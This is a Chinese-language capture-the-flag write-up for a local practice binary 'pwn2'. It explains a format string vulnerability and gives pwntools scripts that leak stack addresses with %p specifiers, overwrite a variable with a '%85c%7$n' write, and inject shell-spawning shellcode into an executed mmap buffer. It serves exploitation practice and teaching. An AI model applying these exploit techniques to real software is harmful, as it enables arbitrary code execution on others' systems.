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分配了8字节的空间，v4是一个双字指针，v4[0]=68,v4[1]=85。然后输出v4和v4+4的值；跟一下后面的函数
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这里要选east

有一个格式化字符串漏洞



这里要满足v4[0]==v4[1],上面的printf就可以用到了。
mmap是一个分配内存的函数，malloc用的就是它，然后read，
下面那句一开始没看懂，就去看一下汇编代码

就是直接执行v1，到这里就可以直接写shellcode给v1了
这里我们利用格式化字符串覆盖内存修改v4[0]

from pwn import *

p = process('./pwn2')
p.sendline('mugui')
p.sendline('east')
p.sendline('1')
p.recv()
p.sendline('1024')
p.sendline('%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.')



先泄露v2的位置

首先泄露内存，v2是第7个参数（1024==0x400）

from pwn import *
context(arch='amd64',os='linux')
p = process('./pwn2')
p.sendline('mugui')
p.sendline('east')
p.sendline('1')
p.recv()

p.sendline(str(int('0x102d2a0',16)))#v4 = 0x102d2a0
p.sendline('%85c%7$n')
payload = asm(shellcraft.sh())
p.sendline(payload)

这里我就直接recv得到v4，比较笨。



这题本来我想不用v2，直接在format里写入v4的值，让format=p64(addr)+’%77c%8$n’但是不知道为什么打不通
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